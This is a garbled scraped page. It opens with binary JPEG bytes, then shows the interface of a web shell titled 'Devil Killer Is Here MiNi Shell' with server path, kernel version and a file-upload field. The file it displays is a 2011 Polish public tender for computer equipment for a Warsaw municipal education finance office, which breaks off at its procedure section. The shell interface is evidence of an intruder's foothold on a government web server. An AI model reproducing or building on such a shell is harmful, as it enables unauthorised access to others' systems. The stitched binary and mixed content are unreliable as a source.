JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111205/412472-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu komputerowego dla Miejskiego Biura Finansów Oświaty m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 412472 - 2011; data zamieszczenia: 05.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Biuro Finansów Oświaty m. st. Warszawy , ul. Mokotowska 55, 00-542 Warszawa, woj. mazowieckie, tel. 022 6969015, faks 022 6213045.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mbfo.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego dla Miejskiego Biura Finansów Oświaty m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 
Komputer - 2 szt.
Typ obudowy komputera	Mini Tower
Ilość zainstalowanych procesorów	1 szt.
Maksymalna ilość procesorów	1 szt.
Technologia wykonania procesora	32 nm
Liczba rdzeni procesora	2
Częstotliwość procesora	3,1 GHz
Pojemność pamięci cache [L2]	3 MB
Ilość zainstalowanych dysków	1 szt.
Maksymalna ilość dysków	2 szt.
Pojemność zainstalowanego dysku	500 GB
Typ zainstalowanego dysku	SATA III
Zainstalowane sterowniki dysków	4 x SATA
Pojemność zainstalowanej pamięci	2048 MB
Maksymalna pojemność pamięci	8192 MB
Rodzaj zainstalowanej pamięci	DDR3
Typ pamięci	Non-ECC
Częstotliwość szyny pamięci 	1333 MHz
Ilość banków pamięci	2 szt.
Ilość wolnych banków pamięci	1 szt.
Zintegrowana karta graficzna 	Tak
Zintegrowana karta dźwiękowa 	Tak
Zintegrowana karta sieciowa 	Tak
Typ zintegrowanej karty sieciowej 	10 na 100 na 1000 Mbit na s
Ilość slotów PCI-E 1x	2 szt.
Ilość wolnych slotów PCI-E 1x 	2 szt.
Ilość slotów PCI-E 16x 	1 szt.
Ilość wolnych slotów PCI-E 16x 	1 szt.
Interfejsy  
1 x 15-stykowe D-Sub (wyjście na monitor)
1 x DVI (wyjście na monitor)
8 x USB 2.0
1 x RJ-45 (LAN)
PS 2 (klawiatura)
PS 2 (mysz)
1 x wyjście słuchawkowe (na froncie obudowy)
1 x wejście na mikrofon (na froncie obudowy)
1 x wejście na mikrofon
1 x wejście liniowe
1 x wyjście liniowe
Dodatkowe informacje o portach USB
4 x USB 2.0 (tylny panel)
2 x USB 2.0 (przedni panel)
Napędy wbudowane (zainstalowane)	DVD-ROM
Moc zasilacza (zasilaczy) 	300 Wat z aktywnym PFC, o sprawności 90% umożliwiający bezproblemową pracę komputera przy pełnym wyposażeniu w dodatkowe urządzenia podpięte poprzez porty i sloty rozszerzeń, przy pełnym obciążeniu
System operacyjny 	Microsoft Windows 7 Professional PL 32-bit, nie wymagający aktywacji przez Internet, dołączone płyty ze sterownikami dla Windows 7 Professional, Windows XP Professional
Karta sieciowa - 1szt.
Architektura sieci LAN: 	GigabitEthernet
Przeznaczenie: 	serwer
Złącze zewnętrzne:	RJ45
Typ złącza magistrali: 	PCI-E 4x
Funkcja Wake On Lan: 	Tak
System operacyjny: 	Microsoft Windows 2008 Server 
Obsługiwane protokoły i standardy: 	WfM Baseline 2.0 - Wired for Management Baseline ver. 2.0, IEEE 802.3ad - Link Aggregation Control Protocol, IEEE 802.1Q - Virtual LANs, IEEE 802.3x - Flow Control, IEEE 802.1p - Priority, Load Balancing, ACPI - Advanced Configuration and Power Interface, SNMP - Simple Network Management Protocol, DMI 2.0 - Desktop Management Interface ver. 2.0, PXE 2.0 - Preboot Execution Environment ver. 2, AFT - Adapter Fault Tolerance, SFT - Switch Fault Tolerance, IEEE 802.3ab - 1000BaseT, IEEE 802.3u - 100BaseTX, TCP/IP - Transmission Control Protocol/Internet Protocol
Switch - 2szt.
Montaż w szafach	RACK 19 Rack 1U 
Protokoły sieciowe oraz standardy
IEEE 802.3 10BASE-T
IEEE 802.3u 100BASE-TX
IEEE 802.3ab 1000BASE-T
IEEE 802.3z 1000BASE-X
IEEE 802.3x full-duplex
Interfejsy
48 10na100na1000 Mbps
4 x SFP
2 porty HDMI na tylnym panelu służące do tworzenia stosu
Automatyczne wykrywanie typu okablowania oraz automatyczna negocjacja prędkości połączenia
Auto Uplink na wszystkich portach
Funkcje
IEEE 802.1Q VLAN (128 groups, Static)
Management VLAN
IEEE 802.1p (CoS)
4 sprzętowe kolejki
Port-based QoS
IEEE 802.3ad Static or Dynamic (LACP)
IEEE 802.1D Spanning Tree Protocol
IEEE 802.1w Rapid Spanning Tree Protocol
IEEE 802.1s Multiple Spanning Tree Protocol
SNMP v1, v2c, v3
RFC 1213 MIB II
RFC 1643 Ethernet Interface MIB
RFC 1493 Bridge MIB
RFC 2131 DHCP client
IEEE 802.1x (RADIUS)
RADIUS accounting
Layer 3 (DSCP) Quality of Service (QoS)
TACACS+
Zabezpieczenie portu poprzez blokowanie adresu MAC
TCP UPD-based priority mapping
IGMP snooping v1, v2, v3
ACL w oparciu o IP oraz MAC
Ochrona przed burzami broadcast, multicast oraz unicast
Ograniczanie pasma na wejściu oraz wyjściu portu
SNTP
RMON group 1, 2, 3, 9
Private Enterprise MIB
Port mirroring - wiele do jednego
IEEE 802.3ab LLDP
LLDP-MED
Protected porty
Test okablowania
Konfiguracja poprzez web
Zapis oraz odczyt konfiguracji
Dostęp zabezpieczony hasłem
Specyfikacja wydajnościowa
Metoda przekazywania ramek: Store-and-forward
Przepustowość: 96 Gbps
Możliwość tworzenia stosu do 6 przełączników lub 288 portów
Przepustowość magistrali stosu: 20 Gbps
Opóźnienie: poniżej 20 mikrosekund dla 64-bajtowej ramki w trybie store-and-forward
Diody LED
Urządzenie: zasilanie, wentylator, stos
Port: Link, prędkość, aktywność, stos
Zgodność elektromagnetyczna
CE mark, commercial
FCC Part 15 Class A
VCCI Class A
EN 55022 (CISPR 22)
EN 55024 (CISPR 24)
C-Tick
Patchcord - 80 szt.
Kategoria	6
Długość 	0,5 m
Typ połączenia	prosty 1:1 (według standardu 568B)
Materiał	miedź
Wtyk	2 x RJ45
Osłona wtyku	zalewana
Dysk twardy - 2szt.
Typ dysku 	HDD 
Format szerokości 	3,5 cala 
Typ napędu 	Wewnętrzny 
Pojemność dysku 	250 GB 
Interfejs dysku 	Serial ATA
Prędkość obrotowa 	7200 obr na min 
Bufor 	32 MB 
Czas dostępu 	8 ms 
Kabel UTP
Kategoria	6
Długość 	305 m
Materiał	miedź
Dysk SSD - 2 szt.	
format szerokości 	2.5 cala 
typ 	SSD
pojemność 	120 GB 
wersja interfejsu 	SATA II (3 Gb na s) 
szybkość odczytu	270 MB 
szybkość zapisu 	270 MB na s 
średni czas dostępu	0,1 ms
MTBF	2 000 000h
załączone wyposażenie 	Wspornik do montażu 3,5
Laptop - 5szt.
Procesor	a) mobilny, taktowany zegarem
o częstotliwości 2,00GHz;
b) częstotliwość szyny systemowej - 400 MHz;
c) ilość rdzeni -2
procesor o równoważnej lub wyższej wydajności według wyników testu przeprowadzonego przez oferenta.
pamięć RAM	4 GB z możliwością rozszerzenia do 8 GB 
dysk twardy	320 GB, 5400 rpm, S-ATA
napęd optyczny	DVD?RW wraz z oprogramowaniem do nagrywania, odtwarzania płyt DVD
karta graficzna 	zintegrowana z możliwością alokowania  co najmniej 128 MB w pamięci RAM 
komunikacja	- WiFi IEEE 802.11b/g/n
- LAN 1 Gbps
porty	3 portów USB 2.0, jeden port RJ-45, jedno gniazdo VGA
przekątna ekranu LCD	15,6
typ akumulatora	6-komorowy
litowo-jonowy
system operacyjny	System operacyjny - Windows 7 Professional PL 64-bit, dołączone płyty ze sterownikami dla WINDOWS 7 PROFESSIONAL, WINDOWS XP PROFESSIONAL
oprogramowanie	Microsoft Office 2010 dla Użytkowników Domowych i Małych Firm
Projektor multimedialny - 5szt.
rozdzielczość ekranu (rzeczywista)	1024 x 768 pikseli
jasność	2200 ANSI lumenów
kontrast	2000:1
ilość wyświetlanych kolorów	16,7 mln
moc lampy	max 250 W
głośność pracy	max. 40 dB
pobór mocy	max. 300 W
menu	Polskie
zoom	manualny (reczny)
dodatkowe wyposażenie	pilot, komplet kabli połączeniowych, torba przenośna (czarna bez nadruku)
waga	max. 3,0 kg
gwarancja na lampę	3 lata lub 2000 h (Okres w którym producent zapewnia bezawaryjną pracę lampy projektora)
gwarancja na projektor- 	36 miesięcy
Klawiatura - 1szt.
typ klawiatury	tradycyjna płaska
komunikacja z klawiaturą	przewodowa
Interfejs	PS/2
Mysz - 8szt.
typ myszy	optyczna
komunikacja z myszą	przewodowa
rozdzielczość pracy	800 dpi
profil myszki	dla prawo- i leworęcznych
liczba przycisków	3 szt.
rolka przewijania	1 szt.
Interfejs	USB
dodatkowe funkcje	przycisk podwójnego kliknięcia 2x click
Pilot do prezentacji (bezprzewodowy) - 13szt.
Dane techniczne:	Wbudowane przyciski do sterowania pokazem slajdów
15-metrowy zasięg działania
Laserowy wskaźnik z diodą LED sygnalizującą działanie
Technologia plug and play
Chowany odbiornik i ochronne etui
Wskaźnik poziomu naładowania baterii
Wyłącznik zasilania
Płyta CD-R - 1960szt.
rodzaj opakowania 	koperta
rodzaj zapisu 	jednokrotny 
pojemność 	700 MB 
długość płyty 	80 min. 
maks. prędkość nagrywania 	52 x 
rozmiar płyty 	120 mm 
Płyta DVD-R 1275szt.
rodzaj opakowania 	koperta
rodzaj zapisu 	jednokrotny 
pojemność 	4700 MB 
maks. prędkość nagrywania 	16 x 
rozmiar płyty 	120 mm 
Pendrive - 18szt.
Interfejs 	USB 2.0 
Pojemność 	8 GB 
Maks. prędkość odczytu 	20 MB/s 
Maks. prędkość zapisu 	10MB/s 
Zewnętrzny dysk twardy - 20szt.
format szerokości 	2.5 cala 
typ 	magnetyczny 
pojemność 	500 GB 
wersja interfejsu 	USB 2.0 
pamięć cache 	8 MB 
szybkość zapisu 	40 MB/s 
szybkość odczytu 	38 MB/s 
Powyższe parametry są wartościami minimalnymi.
System oraz oprogramowanie muszą być zainstalowane na każdym laptopie/komputerze. 
Wszystkie komponenty muszą być objęte gwarancją producenta.
2.Zamawiający dopuszcza składanie ofert na sprzęt równoważny; przez ofertę równoważną rozumie się dostawę sprzętu o parametrach nie gorszych niż określone przez zamawiającego. Zamawiający dopuszcza możliwość zakupu programów równoważnych do programów wskazanych w pkt II.1 SIWZ . Za równoważny program należy uznać program o takich samych lub lepszych parametrach i który jest kompatybilny ze wszystkimi programami i platformami co program wskazany. Oferowane Zamawiającemu równoważne oprogramowania i systemy muszą być dostosowane do aktualnej infrastruktury informatycznej Zamawiającego i nie mogą powodować konieczności jej przebudowania bądź powiększenia.
3.Oferowany sprzęt komputerowy wyszczególniony w pozostałych częściach zamówienia musi być fabrycznie nowy, objęty co najmniej 36 miesięczną gwarancją z zapewnieniem producenta o międzynarodowych uprawnieniach gwarancyjnych poza granicami Polski. Dostarczone urządzenia muszą posiadać karty gwarancyjne wydane przez producenta urządzenia.
4.Wszelkie koszty związane z wykonywaniem obowiązków gwarancyjnych ponosi Wykonawca.
5.Strony ustalają, że naprawy będą dokonywane w zależności od potrzeb, w miejscu wskazanym przez Wykonawcę. Ewentualne dostarczenie sprzętu do punktu napraw obciąża Wykonawcę.
6.Zamawiający wymaga, by czas naprawy sprzętu nie przekraczał 2 dni roboczych. Przekraczając ten termin Wykonawca jest obowiązany dostarczyć sprzęt zastępczy (odpowiadający parametrom technicznym wymienianego sprzętu). Naprawa sprzętu trwająca dłużej niż 31 dni kalendarzowych będzie się wiązała z obowiązkiem wymiany sprzętu przez Wykonawcę na nowy.
7.Przedmiot zamówienia zostanie dostarczony do Miejskiego Biura Finansów Oświaty m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa, w terminie i do miejsca wskazanego przez osobę nadzorującą umowę ze strony Zamawiającego.
8.Oferowany sprzęt musi być fabrycznie nowy, najwyższej jakości oraz musi posiadać europejski certyfikat zgodności CE, a także certyfikat zgodności z normą Energy Star i spełniać wszelkie normy obowiązującego prawa dopuszczającego dany produkt do obrotu.
9.Zapewnia sprzęt zastępczy o parametrach nie gorszych niż uszkodzony sprzęt na okres naprawy dłuższy niż 2 (dwa) dni.
10.Wykonawca będzie odpowiedzialny względem Zamawiającego za to, że jest uprawniony do wprowadzenia do obrotu oprogramowania wchodzącego w skład zamówienia  oraz za to, że Zamawiający wskutek zawarcia umowy będzie upoważniony do korzystania w ramach zwykłego użytku ze wszelkiego oprogramowania dostarczonego wraz ze sprzętem.
11. Wykonawca przekaże wraz ze sprzętem szczegółowe instrukcje obsługi (w języku polskim) dla każdej właściwej jednostki dostarczonego sprzętu.
12. Wspólny Słownik Zamówień CPV:
30213100-6 	30237000-9 
13. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
14. Zamawiający nie dopuszcza możliwości złożenia oferty przewidującej odmienny niż określony
 w niniejszej SIWZ sposób wykonania zamówienia (oferty wariantowej).
15. Zamawiający informuje, iż dopuszcza możliwość zamówień uzupełniających, o których mowa 
 w art. 67 ust. 1, pkt 7 pzp. 
16. Zamawiający dopuszcza możliwość zmiany umowy na podstawie art. 144 pzp poprzez wydłużenie terminu realizacji umowy w sytuacji, w której wykonawca z obiektywnych przyczyn nie jest w stanie wykonać zamówienia w terminie pierwotnie wskazanym w umowie, zaś nie można było tego przewidzieć w chwili podpisywania umowy.
17. Cena jednostkowa brutto jakiegokolwiek urządzenia nie może przekraczać kwoty 3 500 zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż dopuszcza możliwość zamówień uzupełniających, o których mowa w art. 67 ust. 1, pkt 7 pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.70.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony i podpisany wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie (załącznik nr 4) - należy podać co najmniej 3 dostawy o wartości nie niższej niż 25 000,00 zł brutto każda o charakterze podobnym do charakteru przedmiotu zamówienia. 
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji winien przedstawić zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia wg wzoru stanowiącego załącznik nr 6 do SIWZ.
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Polisa wraz z dowodem jej opłacenia, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie niższą niż 60 000,00 zł ważna na cały okres realizacji niniejszego zamówienia, a w przypadku, gdy ważność polisy jest krótsza, niż okres realizacji niniejszego zamówienia, oświadczenie Wykonawcy zapewniające o kontynuowaniu ubezpieczenia zgodnie z okresem realizacji niniejszego zamówieniaOcena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
